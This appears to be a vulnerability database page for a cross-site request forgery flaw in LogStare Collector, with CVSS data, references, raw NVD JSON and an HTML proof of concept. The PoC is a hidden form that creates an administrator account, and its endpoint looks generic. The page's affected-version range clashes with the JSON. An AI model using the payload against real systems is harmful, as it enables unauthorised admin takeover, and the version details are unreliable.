CVE-2025-62687

Description

Cross-site request forgery vulnerability exists in LogStare Collector. If a user views a crafted page while logged, unintended operations may be performed.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:secuavail:logstare_collector:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

LogStare Collector < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!DOCTYPE html> <html> <head> <title>LogStare Collector CSRF PoC</title> </head> <body> <h1>LogStare Collector CSRF Attack PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in LogStare Collector.</p>  <form id="csrfForm" action="https://target-server/api/users/add" method="POST" style="display:none;"> <input type="hidden" name="username" value="attacker_admin" /> <input type="hidden" name="password" value="P@ssw0rd123" /> <input type="hidden" name="role" value="administrator" /> <input type="hidden" name="email" value="[email protected]" /> </form> <script> // Automatically submit the form when page loads document.addEventListener('DOMContentLoaded', function() { // Note: In real attack, this would be hidden and auto-submitted // The request will include the victim's session cookie automatically console.log('CSRF PoC loaded - form ready for submission'); // Uncomment the following line to execute the attack: // document.getElementById('csrfForm').submit(); }); </script> <p><strong>Note:</strong> This is a demonstration of the CSRF vulnerability. The actual attack requires the victim to be logged into LogStare Collector and visit this page. The browser will automatically include the session cookie, allowing the attack to succeed without the user's knowledge.</p> </body> </html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62687
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62687
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62687/
[4] VulDB https://vuldb.com/cve/CVE-2025-62687
[5] https://jvn.jp/en/jp/JVN77560819/
[6] https://www.logstare.com/vulnerability/2025-001/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62687", "sourceIdentifier": "[email protected]", "published": "2025-11-21T07:15:54.680", "lastModified": "2025-12-02T17:52:20.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site request forgery vulnerability exists in LogStare Collector. If a user views a crafted page while logged, unintended operations may be performed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:secuavail:logstare_collector:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.2", "matchCriteriaId": "074556F9-0A35-4E1F-AF34-ADC3A9503B75"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN77560819/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.logstare.com/vulnerability/2025-001/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}